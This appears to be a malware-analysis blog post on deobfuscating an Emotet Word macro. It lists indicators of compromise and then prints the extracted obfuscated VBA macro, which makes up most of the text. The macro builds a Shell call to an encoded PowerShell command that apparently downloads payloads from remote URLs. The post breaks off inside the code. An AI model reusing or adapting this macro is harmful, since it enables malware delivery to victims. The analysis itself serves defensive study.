2019-02-12 Deobfuscating an Emotet maldoc

Code

This blog entry is going to cover how I managed to de-obfuscate the macro from the Emotet sample that I was able to grab. The maldoc can be found in my Github repo located here: http://github.com/bloomer1016/2019-02-12-Deobfuscating-Emotet-Maldoc.

Indicators of Compromise:
==========================
MD5 of Word doc: 35c716c82f9912cb1a57bf7ee72e0c53
VT: http://www.virustotal.com/#/file/9fb5e5242394557e27ca3ccfc492f7db0f7474662148a8797953df702b4d78db/detection
Any.Run: http://app.any.run/tasks/0e428667-3602-489f-85ac-1f022e2c9c1f

Analysis:
=========
So to be honest, I was using this maldoc as a case to try to get better using oledump from Didier Stevens. This all stems from his latest posts on the SANS ISC blog (http://isc.sans.edu/forums/diary/Maldoc+Analysis+of+the+Weekend/24626/ and http://isc.sans.edu/forums/diary/Video+Maldoc+Analysis+of+the+Weekend/24628/). Unfortunately I was not able to get this maldoc de-obfuscated as easily as I hoped with his tool. The closet that I got with oledump was the following cleaned up obfuscated code:

CMD: ./oledump.py -v -s A10 /Downloads/Email_zip_file\ \(1\)/attach/secure.accounts.docs.com
-----

Attribute VB_Name = "sKfw6m"
Function DsiufjK(rPP1jAE, wToiPvr)
On Error Resume Next
   J5UUuW = 123061037 + Rnd(113821029 / ChrB(781545532)) * (KOOBJ15 * CStr(nCU1DV) + (721212395 * 935778426 - dw9RbQ * J3aLT4S * (nBmZw7Zd + ZQYnLzp)))
Set L7zuIbtj = mahsn85
   V9NaRBp = 95561692 + Rnd(957947317 / ChrB(117312524)) * (J6n6Ni * CStr(a7EBBTk) + (63234899 * 42872721 - ovAu45 * Dr73V6D * (i1ShnPJd + V9blDk)))
Set bLLuAm = piEtG96
   kobw56 = 545927644 + Rnd(581946775 / ChrB(607181138)) * (wRoKibm * CStr(sqHIXs) + (282809907 * 875422380 - trm3QUi3 * bCq8sa4 * (YKQibW + QYLnppq)))
Set RYXzEjY7 = zKa8wzwa
Shell (rPP1jAE + iJf1R0 + jG4Ranf + rppKckZK + oM1fQI + nRaN1qpw), l6dXY99 + qnul14Cw + wToiPvr + tzKhPcU + tm0T1td + zEB7op
   fdESF6 = 575508045 + Rnd(683532192 / ChrB(303497533)) * (jLUuzP * CStr(lIzzDBMQ) + (663769490 * 515866827 - KSjEhYc * TENapKzS * (m3KmGvq + uo5K85)))
Set iQMazZ = DmWY1X
   oERpw3 = 383717547 + Rnd(399915385 / ChrB(399256710)) * (vYRhKH4D * CStr(B9GMwTU4) + (603348749 * 303774170 - TjNsOt2S * zBCsvH9l * (QhuGLcAj + p50LBuT)))
Set ILNXV9EK = K6AMEYz
   zqCBZXJ = 548079610 + Rnd(771197523 / ChrB(751962899)) * (Du5G9N6 * CStr(BSd5a4w) + (480523241 * 29726740 - o1MoXz * qzQ3DrzY * (fwQ176Yi + ZXEtUllN)))
Set lL0EPw = VNmiUua
End Function

Function UOiYERH()
On Error Resume Next
H57SuvkQ = 580923321 + Rnd(794405036 / ChrB(922132672)) * (iHzCJs * CStr(zkV9Dr) + (519194540 * 72757858 - cICcc6 * a4LjrPRR * (K9mTHvMT + kEEMhk)))
Set GLp2RS = rW4GqwY
   KlUqpAq = 17708137 + Rnd(707881123 / ChrB(51263178)) * (rkjuGi * CStr(iCHtLi) + (148797801 * 336525818 - KSsCzQFh * rA7lri * (SLD73usJ + ZG1VV11)))
Set pzQpibN = FjBrRP0
   OsiXQFj = 338100754 + Rnd(445330114 / ChrB(702107231)) * (MuhpkGrG * CStr(bw2KXm) + (80762172 * 499341496 - GRZjvF * ajdzrC * (PLupjYWF + bFs7P7Ci)))
Set S84fWnku = EwQXT4u0
QX0ipWjQ = "wersh" + "ell -" + "e J" + "ABIAE" + "wAMwA"
W4muYS = 611167433 + Rnd(614748696 / ChrB(781594660)) * (fuPfln * CStr(U9AvEskE) + (858642824 * 260979276 - sKmAZGO * DOJJvP * (RZSJpVV + cBzNuV)))
Set RbIPGfZ = Qt1lSdB
   z3w9zn = 993073110 + Rnd(741779901 / ChrB(334354848)) * (MFXjaSK * CStr(V9rjsAwK) + (507201983 * 373487450 - j6hCWJ * jFlicO * (ukifDb4 + OQw2wO)))
Set ZlJ1dEIU = QXIEdF
qYGMCi2F = "zAFIA" + "QwBS" + "ADA" + "APQAoA" + "CcAS"
TzUjia = 565698346 + Rnd(225118524 / ChrB(638188131)) * (cK5zSF3q * CStr(S1p6uJCo) + (653494707 * 327994882 - G3Gw7P * jrWE1NS * (TEHwLC9 + mQjj0A0)))
Set BsdJmv = hikFh2
   CzSFDc = 632134329 + Rnd(86595323 / ChrB(830203560)) * (BoAkuO * CStr(KqZVRq) + (609165067 * 436608025 - qzwQMo9 * Ds9O9z * (f7ivcUh + hbBYbBR)))
Set ZivcVm = zVOcbh
ZzzVfP = "wB2" + "ACcAKw" + "AnA" + "GQATAA" + "nACsAJ" + "wB1AHA" + "AcgAnA" + "CkAOwA" + "kAEo"
TXKcPvDT = 236589529 + Rnd(877971834 / ChrB(388169523)) * (HBiw30jH * CStr(Jh1rBfNz) + (444691419 * 228218004 - Vt2tHnq * uE9Q2ijN * (dwp05YEB + C7Ejol)))
Set H33aXtRd = IAnmCRo
   Cbnwmb = 446275897 + Rnd(161868866 / ChrB(164012177)) * (PUEsWO1U * CStr(cuTsqawk) + (616637866 * 634967740 - qMjIhdQ * ZVuL4D * (jBbQLir + wAojhi)))
Set a2INrWDt = UihzXE
   r98HzMT = 581348660 + Rnd(53715188 / ChrB(897420664)) * (pKU2LKi * CStr(ss2kNT) + (274942974 * 701914311 - lcFmn9Z * rpVWYKj7 * (i16IL9QG + tC3HXrK)))
Set k3vnwMn = YaqXc8R
zVCl3I58 = "ARwBU" + "ADk" + "AaQBZ" + "AE8A" + "YgA9AG" + "4AZQ" + "B3AC" + "0AbwB"
krRqwkL = 115930249 + Rnd(367062198 / ChrB(963166020)) * (wfZ4XkYu * CStr(W0bjcfVR) + (255655955 * 972165962 - iRQzY7D * cujvkVj * (F3VrQRP + jvFrFn)))
Set GnhMcrXU = su2Jvl
   FLio6M = 559670781 + Rnd(548770074 / ChrB(838715768)) * (nak9lG * CStr(RA2fnU) + (447465294 * 450247896 - dLB40O * XtuhFih * (IVdl1i + LPp2Tdud)))
Set mE2bV1 = bbw5X89
fcsnuE = "iAGo" + "AZQBjA" + "HQAIAB" + "OAGUA" + "dAAu" + "AFcA" + "ZQB" + "iAEM"
m14DVL = 572995062 + Rnd(682774435 / ChrB(713694484)) * (CnNPstY * CStr(lidlnh4I) + (32789883 * 481696362 - LPpdlNFj * WIBfdvn * (bucYLWRZ + WoO32w)))
Set oHfTsPQ = iHEHfOk
   maFmfhG = 382677825 + Rnd(402723107 / ChrB(567869187)) * (hiIL3p * CStr(NpI7Q2u) + (246140479 * 273502882 - T5fznjK * RiDVzIz * (XqibVSES + hw2GiJ2)))
Set nfmrcr = fwHIETcw
cNsVZwis = "AbA" + "BpAGU" + "AbgB0A" + "DsA" + "JABQAG" + "YAdwBI" + "AGMAW"
wQEJF5C = 910857363 + Rnd(735772532 / ChrB(646045182)) * (EKvQVU6 * CStr(JwMTOfsV) + (302030066 * 761120045 - Q7stFCpH * zEVElaMR * (Ztzb3z1Z + W3zwwOD)))
Set PPvXfz = I4RJBwZV
   MMwCzQk = 635618321 + Rnd(211664598 / ChrB(172405967)) * (cHhmFk * CStr(JzqwIkPU) + (835699373 * 889928129 - mvQaXAB * YVWJFp * (ULcwHd + w4OBQzT)))
Set Rw1HOF = bsdTpC58
   spHYft = 787943675 + Rnd(503285352 / ChrB(823021615)) * (GGSl8Djp * CStr(B43bwAH6) + (434043747 * 881188666 - wOGjjlQK * i9RvNSj * (D3UwvO8 + jjYKOUID)))
Set Y6Zk7kO = CwwZfO
SomS25ZG = "ABaAF" + "MAPQ" + "AoACc" + "AaAAn" + "ACs" + "AJwB0A" + "HQAJw" + "ArACcA"
ndWlmv = 950216595 + Rnd(508699961 / ChrB(660160967)) * (Q2Fw5w4 * CStr(YCZiDDBa) + (166636103 * 591485776 - MF5EAuBr * LR1CllA8 * (zZwrE3hi + RE2zEwK)))
Set B3NdjzHn = VaNB5sz
   PZBhBY = 432847934 + Rnd(740372105 / ChrB(341720823)) * (bErf4p * CStr(bqF0hm) + (687029270 * 950393171 - ktTliuB * NnGj6f * (zzZwcr + RMad6V)))
Set MnXz7k8 = dRoaHKd
GNc88i = "cAA6A" + "C8AJwA" + "rACcAL" + "wBk" + "ACcAKw" + "AnA"
UOiYERH = QX0ipWjQ + qYGMCi2F + ZzzVfP + zVCl3I58 + fcsnuE + cNsVZwis + SomS25ZG + GNc88i
End Function

Function B8waSCi()
On Error Resume Next
XwR36w = 740956857 + Rnd(869941583 / ChrB(530943620)) * (tSr33Iti * CStr(IXD5ru) + (825502236 * 225898445 - pD1Vsi * PdKbEz * (cwiQM4f + WO9OB5)))
Set JJzcVKY = KwHsSPZ
   MnccV7 = 961190641 + Rnd(579445124 / ChrB(898137460)) * (Tmn4GCm * CStr(dPqURfh) + (903131872 * 722011649 - a4HzPP5 * YjjuY917 * (V5tnn08 + rZD2Sv)))
Set awo2HUu = j67Tpk
mm44hw = "GEA" + "JwA" + "rAC" + "cAZA" + "BhACcA" + "KwA"
InO4O3Nf = 199648397 + Rnd(456529921 / ChrB(252932517)) * (S90uLjr0 * CStr(YT9qV8) + (203543474 * 467348574 - rCHVfI * zEmhoS * (ztRZFzp + iQL3i00n)))
Set Q2nOCq = Wr7pq9
   zcdKINwA = 305479612 + Rnd(453469133 / ChrB(364375221)) * (rcR0ckR * CStr(kpP3jv) + (140260638 * 45658419 - ti19I9zw * sjorwO * (cHlYw3u + NrA3Qzj0)))
Set YJAowB4O = cESKof
   Or9bom = 801021977 + Rnd(593364666 / ChrB(394078277)) * (uu9tbvb * CStr(lWwHzjQu) + (182045760 * 66368653 - qu16Wil9 * LVjHmpjp * (izZ532n + CZU8sE0)))
Set EQ1Vj5Jd = ulNjnBKB
o8NUEiH = "nAG" + "YAYQBy" + "AGkAb" + "gBnAG8" + "AcwA" + "nACsAJ"
WVGzsPp = 794294215 + Rnd(739163166 / ChrB(69831388)) * (uwT00uz * CStr(Lk18UDwV) + (742897564 * 330744520 - YFs2vkBA * V1MHPzp * (oQjNuP3 + uc0tkz)))
Set fIOKvUWz = nMz0pP
   KzY2MmM = 871634362 + Rnd(506657181 / ChrB(584139411)) * (iYBN4f * CStr(p4wT1YS) + (718321847 * 645022795 - m7YRzA * j2LwYpP * (PXoLZXl + EAwTiO)))
Set fOLHNN2 = ZlEYnl
   H0UFlvcY = 368496449 + Rnd(755538298 / ChrB(4852398)) * (SppvEM * CStr(A5bEt7C) + (48005019 * 485850505 - IHnvpZrs * Il9f92 * (zTSiNHE3 + qZV3BTQG)))
Set AWXdXU2T = mFUMiaY
jzYz573 = "wB0A" + "GEAcgA" + "nACs" + "AJwAuA" + "CcAKw" + "AnAG" + "MAJwAr" + "ACcAb"
Ss7dvFBj = 658707985 + Rnd(741460773 / ChrB(863073318)) * (f0H93w * CStr(tzAuJLs) + (103099660 * 527807294 - UjYoVM * nwzw75 * (p3VjD9 + v7tl5TZ)))
Set lfpMUw = ljzC0Ezl
   u0sop6jn = 669096961 + Rnd(367437000 / ChrB(234394384)) * (jBjHPvh * CStr(EVDM8Rw) + (997570283 * 857621762 - kruGpMB * KIVzji5w * (VU8X4Xk + PwpfzJt0)))
Set XCujCT8 = hYX0KZ
J6EaO6 = "wBtAC8" + "AJw" + "ArA" + "CcAcgB" + "0AF" + "EAdwBU"
cfWDMuO = 561080402 + Rnd(307034837 / ChrB(452682044)) * (lRkuXEFd * CStr(Of7DVN5) + (121958036 * 686562204 - rusNANjM * NrkZTf * (iYUjEO2 + VBoLvw)))
Set b3jW2fRs = pWoBr5
   VSNjYf = 938352640 + Rnd(281385414 / ChrB(305682240)) * (p34Ruh1 * CStr(MUvAh7tT) + (680785701 * 180003934 - GOUWj2O * F1UNhOLI * (AJUzFhN + nmlHOMp)))
Set wNpl49I = o0siL5z
   Xqms33DF = 860284994 + Rnd(816974520 / ChrB(432755606)) * (BUSGn3 * CStr(jF1vo4k) + (283074538 * 474804983 - t0ZjrX * nfwzUlsF * (ssR5Uul + L0czXdT2)))
Set nktm8wJ = bK7wwn
woo96Zz6 = "ACcAK" + "wAnADU" + "AJw" + "ArACcA" + "NQB6" + "AEAA"
jhoci1Oj = 249824459 + Rnd(385038570 / ChrB(802697655)) * (isaVuW * CStr(wjRU7A6K) + (138134194 * 991762995 - O35wi7 * qiNqQO * (ST6Ph5r9 + f1TVGY)))
Set zswl1zw5 = SlErsJw
   RqSbml7G = 493294547 + Rnd(941951185 / ChrB(107727560)) * (Ej9pZi * CStr(DtTb87) + (470117345 * 906077628 - DJlhdMA * f8CEo1H * (VRknGtP + AoodLHSC)))
Set cGvo97v = iok110
   XcutWDO4 = 590959662 + Rnd(964447523 / ChrB(72472530)) * (uiA0JR * CStr(zYmrDH) + (414704443 * 283378948 - b3zjv2p * RpDO00 * (QCN0Az + CHCT6wl)))
Set cvPTwI = DcY7Knrq
zpfFBH = "JwAr" + "ACcA" + "aAB0AH" + "QAcA" + "AnACs" + "AJwA6" + "AC8ALw" + "AnACsA"
qPSOSzr = 273662946 + Rnd(301592405 / ChrB(403393355)) * (kciM5LYD * CStr(P1E8JAS0) + (476476745 * 936633883 - NIX2dJn * o8oVG23t * (iXJ8cKU + wT6lTHMV)))
Set kOaOuf = fDIaPFj
   lV7a7Wih = 29791594 + Rnd(330322809 / ChrB(49106137)) * (RKVHZp6Q * CStr(jUa7Lf) + (410399670 * 571741316 - UbhYIwIs * KBDWSMN * (JJa6TQ + VSCmvli)))
Set j79mjMpL = OEn0RGj
bOIDQsaj = "JwBm" + "AGkAJ" + "wArAC" + "cAbABl" + "ACc" + "AKw"
njDMcZ = 65144999 + Rnd(867128970 / ChrB(155940769)) * (EWFUh5t * CStr(mEOimR) + (672095181 * 533618897 - OrKJ9jLM * BtkjPpK * (VMFtFWq + iKtjAdY)))
Set KGuWrLXF = kS8HfCb
   EpfAUYB = 151644257 + Rnd(98819593 / ChrB(942538894)) * (cOPXaFlZ * CStr(CSY3wLKC) + (910136498 * 254367424 - mwKEdWjI * RTmMDBh * (jXPmMl + r0DCSKk)))
Set LWmO17i = EQkHJisO
J8cCvsJ = "AnAC4" + "AbABhA" + "HUAYQ" + "BzAGk" + "Abg" + "BoAC4" + "AYwB" + "vAG0"
B8waSCi = mm44hw + o8NUEiH + jzYz573 + J6EaO6 + woo96Zz6 + zpfFBH + bOIDQsaj + J8cCvsJ
End Function

Function BIBrlzL()
On Error Resume Next
salW3cd = 897688160 + Rnd(173242530 / ChrB(572437022)) * (Gzmr88 * CStr(s5L1Fu) + (505833081 * 87354455 - k22CKl * zK8kYkk * (Vi736d0p + nRI8Yo)))
Set zJFmAjVA = OflPaw
   SVSj7IL = 498493456 + Rnd(257208968 / ChrB(175405816)) * (sOQj7ssG * CStr(i86MMLzA) + (133236746 * 143755478 - WobX5lw * EXHKbEB * (fmKovU + wArPCcaW)))
Set EizGRqS = pBuGvp1
LvY3XP = "AJw" + "ArA" + "CcA" + "LwAn" + "ACs" + "AJw"
sdbVwkcl = 994524332 + Rnd(220288436 / ChrB(179756893)) * (IfrPWDOt * CStr(YipZKP9S) + (717361710 * 557880855 - bvJuusS * k3RvKJXm * (AAi9wGK + B6c26w9)))
Set fSfbLN = Uo0Fkpw9
   ankR7E = 139855470 + Rnd(657506679 / ChrB(209285051)) * (GTcMEiE * CStr(DR6qaozi) + (403650313 * 120336883 - ws9WibA * sU48jtPl * (iM5PNs51 + hPF6AJ)))
Set rjHESDN = l46i4l
Dcvnnls = "BQAC" + "cAK" + "wAnAF" + "gAZQBo" + "AEwA" + "JwA" + "rACcA" + "UAAnAC"
DQRBBiZ = 129612578 + Rnd(158530774 / ChrB(979388377)) * (cmZZj5m * CStr(TO4qOPa1) + (996308587 * 268788261 - JAfOvvk5 * XGC7UDP * (vlhqBYUz + OKs3sXm4)))
Set GCaYBwwo = TkNfSEoU
   Mud3Tm = 254708547 + Rnd(546893607 / ChrB(656376276)) * (VuujdIqE * CStr(CVvKYK) + (679619170 * 309913694 - LmKFnp3K * Z4o4zcv * (OMa1BMZ + wbjOi7mw)))
Set wzPfmPsI = T6Z043hw
   rfHzP8Z5 = 779452360 + Rnd(314524005 / ChrB(434963530)) * (QBz6aLW * CStr(mO98tV) + (75953258 * 777698624 - rk7MsQBp * zpKVk0N * (VzwAjv31 + EzAvkK)))
Set qEpZfjR = DnXtHl
Bkabza = "sAJwBQ" + "AGw" + "AQA" + "AnACsA" + "JwBo" + "AHQAdA"
zziwRDBb = 705064820 + Rnd(15520999 / ChrB(155267771)) * (LfJvfTt * CStr(LCjivZa) + (655770653 * 621557200 - sH9Ek4 * LYsCkwh * (aPsiiikc + OlADY70d)))
Set ELl3QD0 = wsOKsJXf
   iSwATJ7D = 117721301 + Rnd(410169800 / ChrB(903695667)) * (iHJ6jJ * CStr(Gwo54j) + (14831678 * 668017117 - JFRvLWjw * WkA7M3NM * (u8XkhiJF + wX1bsWB)))
Set pZu1ishz = BVzZbEOs
   AtDAi4 = 79192877 + Rnd(356646810 / ChrB(193150959)) * (aoA2az * CStr(LOb0jNM) + (577273781 * 10214071 - RwhbP27 * fkaCrop * (FlFIbj0 + bzRTE0sZ)))
Set KvAiiVzn = P2hzC5v
wbqHZhV = "AnA" + "CsA" + "JwBw" + "ACcA" + "KwAnA" + "DoAJwA" + "rAC" + "cALwAv" + "AGEA"
SN9EOt = 400801773 + Rnd(706481524 / ChrB(212746292)) * (pJzzDbE * CStr(BVihzT6f) + (537372501 * 220808891 - FivJH6WF * fmLmiPa * (i3F0Bp + vz4K0r)))
Set iBq7fsTh = wVLvqEDA
   kpApXD = 162495480 + Rnd(792398794 / ChrB(649698527)) * (ZjMwL1wW * CStr(avAOshlF) + (509792796 * 554562066 - uFzVoWK * Rzr8ih * (fSoYIL + WofirI)))
Set CqGBzLc = iK6TRK0A
   QrPd0du = 571751711 + Rnd(596249814 / ChrB(290889878)) * (Nm3GRu7 * CStr(srhXaJ) + (720783157 * 982961732 - jilpU4 * pbrP9z * (ZHA8GhwP + lFiTBk)))
Set cEp8iMGk = dlsrvl
nDv43V = "JwArA" + "CcAbgA" + "nACsAJ" + "wBn" + "AGkAcg" + "BhAH"
Z6swz6 = 439748052 + Rnd(831622495 / ChrB(404758131)) * (iT1dj2 * CStr(OsV0Oabj) + (823614072 * 607952038 - WQu1kdF * rXimkRB * (HACk4iI + SXWmNtF)))
Set iA4Fw5c = pWoIZ2T
   n18jT6 = 952144196 + Rnd(230294134 / ChrB(425223701)) * (E63TCnf * CStr(wHztkj) + (400904022 * 632467969 - r5jZ1T * tbVUAIDU * (w1PIRBKm + zwjT5J)))
Set cfBAB1m = hHopPJro
   Qss2NEcF = 361089100 + Rnd(965824406 / ChrB(716103464)) * (lj2OjV9 * CStr(POAaPUz) + (982453181 * 801390467 - JtiF4C9E * NiRcvtJ * (PMM8Zd + qIRXKNHd)))
Set oUjW4J = jt9iko
rWLso0 = "MALgAn" + "ACsA" + "JwBv" + "AHIAJ" + "wArAC" + "cAZw" + "AvAH"
mtz3DZX = 962115688 + Rnd(186144534 / ChrB(171845330)) * (AVs08A * CStr(SolOHZ5) + (162493122 * 948977706 - wSzPGBW4 * WOADo9 * (Ii8ISBE + noiNApK)))
Set KFl8kGmS = iLda4zw
   caBTAmqM = 871765078 + Rnd(707258343 / ChrB(507267468)) * (BIp99Gz * CStr(ojjioYnr) + (928811235 * 513266027 - TMfp2vfS * QAU746 * (LMEunc + wSjKw0w)))
Set wKTGVRT = MjOrirqr
jiC3ZwNt = "gAJwAr" + "ACcAOA" + "BCAC" + "cAK" + "wAnAG" + "oAYQB" + "NAC" + "cAKwA"
wM1jwl1h = 80999420 + Rnd(445577673 / ChrB(144647992)) * (WwFwvU * CStr(j2jZNZ) + (404611844 * 802660200 - LsmdTW7P * toRX6I * (N3SzuzRU + fLbt7d)))
Set Z9cs2f = KCjJiE
   SAuc9T1G = 521046457 + Rnd(991904743 / ChrB(334991763)) * (UkjtcWo * CStr(EwKCdiA) + (338337561 * 636398123 - ZuYfKj * UfLN9mE * (iVwNz1 + P71SGLWw)))
Set hMDi3m = A4jMZYw
   NknRZU1L = 947509473 + Rnd(456253818 / ChrB(316982394)) * (sQ5fdSQA * CStr(QziCoroP) + (280977523 * 226482944 - wTrLE9 * JiofpJ8z * (rw42Ub + JdRMCs)))
Set RlwSOSRm = J9Wfuzh8
NpY8wL9 = "nADQ" + "AJw" + "ArA" + "CcAN" + "AAnA" + "CsAJwA"
wl7PnKt = 339086241 + Rnd(587795483 / ChrB(159454497)) * (mYKEPfo0 * CStr(zU8Tljd) + (914514087 * 730759206 - QwMOQ3X * vmLtvn7 * (bG6CaomR + K2pa5Ra)))
Set s0mQm4nT = c9km8M
   GM27B0 = 935041082 + Rnd(773137296 / ChrB(937261156)) * (u86X8k * CStr(YCFSEMc5) + (102353533 * 556183881 - Nv6tXkGS * riO5GR8C * (zPaFC4z + DzNXqvI)))
Set AWdnMr = DKFL8E9
Shl9iw = "0AEkA" + "QABoAH" + "QAdAA" + "nACs" + "AJw" + "BwACc" + "AKwAnA"
b8tqLvh = 740872502 + Rnd(958053801 / ChrB(844614177)) * (wYNlRjnA * CStr(w0hCqNHG) + (278944652 * 239573739 - tJIFBLE4 * IVMK0jm * (bzzBtJI + f2jI8J)))
Set XMhb7s = rLzfOld
   Ujzz0k = 496985461 + Rnd(963076803 / ChrB(572193659)) * (NzXiwwP * CStr(IAwXoj) + (937109883 * 110568400 - lzdUG7v * RiSFzhL * (M99kQf + mZKZoXz)))
Set swcRlCaw = s601d1s
   ivOPAV = 947449998 + Rnd(912092045 / ChrB(427464764)) * (pfbuo5j * CStr(dPYOPU8) + (577691146 * 752099965 - lXm0KRW * U5kS64r * (hbWv1f + z0pYWJu)))
Set V4cjWiA5 = iFTWmkT
zhGozS = "DoA" + "LwA" + "vAGEA" + "ZABzAH" + "UAaQB" + "kAGU"
BIBrlzL = LvY3XP + Dcvnnls + Bkabza + wbqHZhV + nDv43V + rWLso0 + jiC3ZwNt + NpY8wL9 + Shl9iw + zhGozS
End Function

Function wBuzmLiw()
On Error Resume Next
vNrK59 = 956706527 + Rnd(818839896 / ChrB(796694744)) * (NHaPKlrO * CStr(NcdZw8Mj) + (337452864 * 740566261 - cskorLpR * C8fChbIh * (ZVovNvI + Pcwfijro)))
Set ajPlhZj4 = nYzD3RM
   lDoFh0l = 472973831 + Rnd(808105059 / ChrB(834895767)) * (winr3f * CStr(JmAJACGd) + (874977290 * 543129242 - jWY6wzKs * OBIW9RhL * (XGRFCiE + GlQrNhmG)))
Set CVTLiV0A = q7rUkb
   PnSizzU = 213939234 + Rnd(774407036 / ChrB(371253078)) * (LI11W9 * CStr(boSXYXZk) + (766663396 * 408958789 - nsdUNPA * YrQMQb70 * (HqS2oV + XZtbWU)))
Set ZpfmH9 = D8CLH6cl
qc2z0SEi = "ALgBjA" + "GwAJwA" + "rACcAd" + "QBiA" + "C8AeQ" + "AnACs" + "AJwA3A" + "CcA"
lbU0oKiJ = 988155962 + Rnd(209797982 / ChrB(816298229)) * (SLM5jYVq * CStr(AV1tQoa) + (744496409 * 566978797 - tp1aiXp * ozZlwlkB * (cGHGTow + ZjcPYU)))
Set SiCAqcz = wO6oEY
   IIfvfQ = 126723074 + Rnd(435246359 / ChrB(239927486)) * (Iwb2OvdJ * CStr(pmHtUpiO) + (274313895 * 667423204 - wT9PHuL * Dj4lNf * (fPAbJWjY + fnM8nA)))
Set G30ot8Gz = LHHKRj
   ZGimFT = 448910842 + Rnd(975006233 / ChrB(902959419)) * (DquEND3h * CStr(qRtwwj) + (694330149 * 839966900 - UQmifl * itIzz8 * (QDciJik + qvzTtuII)))
Set pDMjlAz = uBbvvW
Oujhvq7b = "KwAnA" + "DcAUQB" + "UAEsA" + "aABW" + "AEAAa"
JNkiz3t = 972918120 + Rnd(62913320 / ChrB(675933919)) * (TLltLFr * CStr(vq5uWh1) + (117545973 * 552808295 - uJlddw * KHUJTIK * (wXkuX1Qh + WU42fp1f)))
Set GQWRRib = fmMMHLK
   LhWNjJ = 422361797 + Rnd(825988100 / ChrB(960446742)) * (unQbwl5 * CStr(RBHvYS5) + (371852211 * 669689825 - SbnCHit * VBGmPuw * (Mfj3rq + fzQPDJs)))
Set XANTP2 = JT6ffnd
QV7zAXF = "AAnAC" + "sAJwB0" + "AHQ" + "AcAAn" + "ACsAJw" + "A6AC8"
ccEjDY = 754402666 + Rnd(918619055 / ChrB(332129654)) * (oOdci46m * CStr(iGQzdXZn) + (365204995 * 167486757 - T9LUVwT * iZZ3O2R * (JoKf8V + iBUR82LZ)))
Set OKhJTRZ = s7OjIwG0
   IoDhaM = 680309150 + Rnd(409541587 / ChrB(272583767)) * (w77M0s * CStr(KIOUAj) + (230196283 * 737336328 - NojRw9VK * Qcrz7p * (onJOQb + vUD9Mc)))
Set BDpnH92 = J1tabXUz
BzjlMR1F = "ALwBt" + "AGkAY" + "wBoA" + "GEAZQ" + "BsAHc" + "Acg"
YEZYKz = 484079901 + Rnd(856252385 / ChrB(453031564)) * (ni7woC * CStr(JKCbiHz) + (524843583 * 525322135 - Q8appC1 * fAi2So * (QLbYIcd1 + vRXR8Jz)))
Set R3RuzH = JlKI1m
   d1qKOZ4 = 569587438 + Rnd(40491157 / ChrB(795065016)) * (XuzjUS * CStr(DZd4Q6L) + (484350220 * 264894368 - EOzuWb * XPiDk4 * (CJoPjWcj + p4SNZS8)))
Set Fo0dE3BC = S3AzFJU
OQKf7zP = "BpAG4" + "AZwBs" + "ACcAK" + "wAnAGU" + "AJwArA" + "CcAcgA" + "uAG" + "MAbwAn"
iPajiivw = 758049099 + Rnd(29968186 / ChrB(84134420)) * (zpJCJLqM * CStr(lPirktdA) + (454640686 * 979235537 - Ysphul * Gw2Kmaf * (kLvlUrR0 + CRBnzS)))
Set WXlbEj = vYXFJN6J
   JJBzKd0 = 533760493 + Rnd(204798771 / ChrB(972421293)) * (NRAdWzj4 * CStr(kjTTa5sC) + (597516013 * 796959116 - EZXt08 * WTW13z * (DhjJtWb + rDFwKXL)))
Set KkGm1lzt = IdblLF9
   aUmOd6IY = 813499503 + Rnd(892580030 / ChrB(229282420)) * (RSLoKM * CStr(S4zDjIX) + (92456921 * 676503421 - VVCFZLfI * DUdaRK * (ZlrvMJaz + ouTITP4r)))
Set ncoDSN = SnS9SVL
ds84PI = "ACs" + "AJw" + "BtAC8A" + "SQBSA" + "FkAWQ"
EnFmNMk = 158944847 + Rnd(495498364 / ChrB(317397199)) * (Odn3lV05 * CStr(Ho8sazts) + (643924693 * 122337613 - nsBzvw * iPdW9V61 * (Nw0Ria + ozZwp7B)))
Set v2vjLAoO = itE24Z
   s53wzV4 = 433634640 + Rnd(637973148 / ChrB(324097061)) * (QL2bUcc * CStr(Qr7U65E) + (601877437 * 277611535 - wQEmdcQh * C8fzwrY0 * (ppDhM7 + WzzWsRhD)))
Set w3L5Mi = WjGMplSZ
bZjAXG = "AnAC" + "sAJwBx" + "AFAAY" + "gA1AC" + "cAKwAn" + "AE4AJw" + "ApA" + "C4AUwB"
zJaNqwG = 899556606 + Rnd(323850921 / ChrB(502299257)) * (ZBRanD * CStr(HPwVsmL) + (866253917 * 206154605 - kCATQD * CVNSNDan * (TuAQTSt + aDnOqP)))
Set GirAX8IF = zlSR9ojz
   w8C6ATj = 241659996 + Rnd(221131664 / ChrB(67853889)) * (i9Spcmnn * CStr(GYHS4bwL) + (941622527 * 173833504 - cPNYlMB7 * Zzl8sa * (PItCzo + VHcBHKGr)))
Set WDAal7 = uTr7tW
lsk59K2 = "wAGwA" + "aQB" + "0ACgAJ" + "wBA" + "ACcA" + "KQA7AC" + "QAa" + "QAw"
KLPzsmr = 338153119 + Rnd(235357777 / ChrB(298636519)) * (bEp1Ja * CStr(S9RcLCBV) + (489922374 * 216470377 - Ti45Ca * kkpPUapz * (MHuHRN5z + fV1Bzc59)))
Set qs9vBvSC = TNXf9YRP
   tXsOkA = 610084019 + Rnd(501257081 / ChrB(868022676)) * (JzOPLhAY * CStr(laT7L1dP) + (771486829 * 751382428 - rGbF8Pf * qX59YshP * (lwHJ7YS + HPFMIz)))
Set pFku4j = CZ9zH6A5
MzvEWt = "ADUANQ" + "BhAG" + "wATw" + "BQAD" + "0AK"
dLH2l3 = 483458888 + Rnd(225844508 / ChrB(860698071)) * (H2cI5E7 * CStr(hMXBjRrT) + (286274657 * 198493336 - VPoPcU * lCcOsj * (FO4wLtWW + RULK7p)))
Set llz3cu = GltJTA
   j29Ibk = 628709120 + Rnd(937903414 / ChrB(301295133)) * (NSZmmzz * CStr(I3f6tn0) + (970414523 * 752346545 - hCjjXr * mzS0sTiz * (r4kY03 + CZwkoLT)))
Set LvzP6WDP = uzmOzzo6
CSfGq3 = "AAn" + "AHQAcA" + "BZA" + "EUAM" + "gBvACc" + "AKw"
s30bZv = 323743509 + Rnd(971962241 / ChrB(573005648)) * (zdtWJ6K * CStr(DVh498) + (840601367 * 509444007 - B7W2DV * q3UoFSil * (Qhza9A + RFdb6wv)))
Set ZmmqAUOW = UPPYX2jL
   MR7BGw = 599233617 + Rnd(898967321 / ChrB(769829978)) * (ZrrcTkiE * CStr(EkHTrLXt) + (661800549 * 658446957 - Gj1Dk6M * mYC4rqf * (DdKQJrwr + LJGmEAk)))
Set NAn2XiV = VAf2Kz
   jwlnQu = 591392880 + Rnd(219462055 / ChrB(442769878)) * (njbzqXI * CStr(NqIEHw) + (220029654 * 987614661 - z67lwo * wY9RiC * (cjLlw0L + Aojfchlm)))
Set jz8mIMP = C0LG9pQ
